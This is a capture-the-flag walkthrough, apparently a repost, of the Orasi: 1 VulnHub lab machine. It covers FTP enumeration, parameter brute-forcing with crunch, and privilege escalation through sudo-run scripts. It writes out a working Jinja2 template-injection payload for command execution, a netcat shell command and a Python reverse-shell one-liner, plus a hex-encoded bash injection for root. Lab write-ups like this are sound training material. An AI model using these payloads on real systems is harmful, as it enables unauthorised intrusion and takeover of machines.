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Orasi: 1 vulnhub walkthrough
2022-08-02 03:59:00 【xdeclearn】
Download address: http://www.vulnhub.com/entry/orasi-1,660/
Hint :just one useless little dot
0x01 information collected to get shell
Port Scan:
Use anonymous to access ftp and get a file: url
.This file is a shared link library.First look at the main
So convert each character in the insert to acsii code, and get a string of characters /sh4d0w$s
, which looks like a url.
Access port 80, get a string of strange characters, looks a bit like the parameters of the password dictionary tool crunch
, it will be useful in a while.
When the browser accesses port 5000, it prompts that the url cannot be resolved.
You can see that the server is flask, based on python3.7.3. Many people here should think that there may be a template injection vulnerability
in the page.Use the url address obtained above to re-visit, prompting no input, it seems that parameters are required.
Using the information obtained by accessing port 80
, use crunch to generate a dictionary to blast parameters.
[email protected]:~/test$ crunch 6 6 1337leet > test.txtCrunch will now generate the following amount of data: 326592 bytesCrunch will now generate the following number of lines: 46656
Finally get the correct request parameter l333tt
.Referring to flask/jinja2 template injection, we successfully accessed the urlhttp://$s?l333tt={{%22%22.__class__.__mro__[-1].__subclasses__()[183].__init__.__globals__[%27__builtins__%27][%27eval%27](%22__import__(%27os%27).popen(%27whoami%27).read()%22)}}
implements command execution.
Directly nc -e /bin/bash 8080
to get the shell.
0x02 Privilege Escalation
View sudo -l
View jail.php
As you can see, exec has command execution, but restricts the use of some functions.Here we directly use python to bounce a shell of a user kori
. After entering python, use import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",8081));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Continue sudo -l
You can copy
directory and give other users write permissions.
nc uploads it to the local for decompilation, finds sensitive information, searches for irida
, and finds the user password. It should be noted that the password has undergone a simple change protector
.Above is eye.of.the.tiger.()
There is another brain hole here. Fortunately, the author gave a hint: just one useless little dot, which means that the above string needs to be removed by a dot. After testing, the actual user password of irida is eye.of.the.tiger()
Use ssh login, continue to view sudo -l
, you can execute oras.py
as root user.
Execute directly, enter something casually, and get the code information from the error.
It is obvious that the exec execution code is embedded, and the import os;os.system("/bin/bash -i");
is hex encoded and input, and the root permission is successfully obtained.
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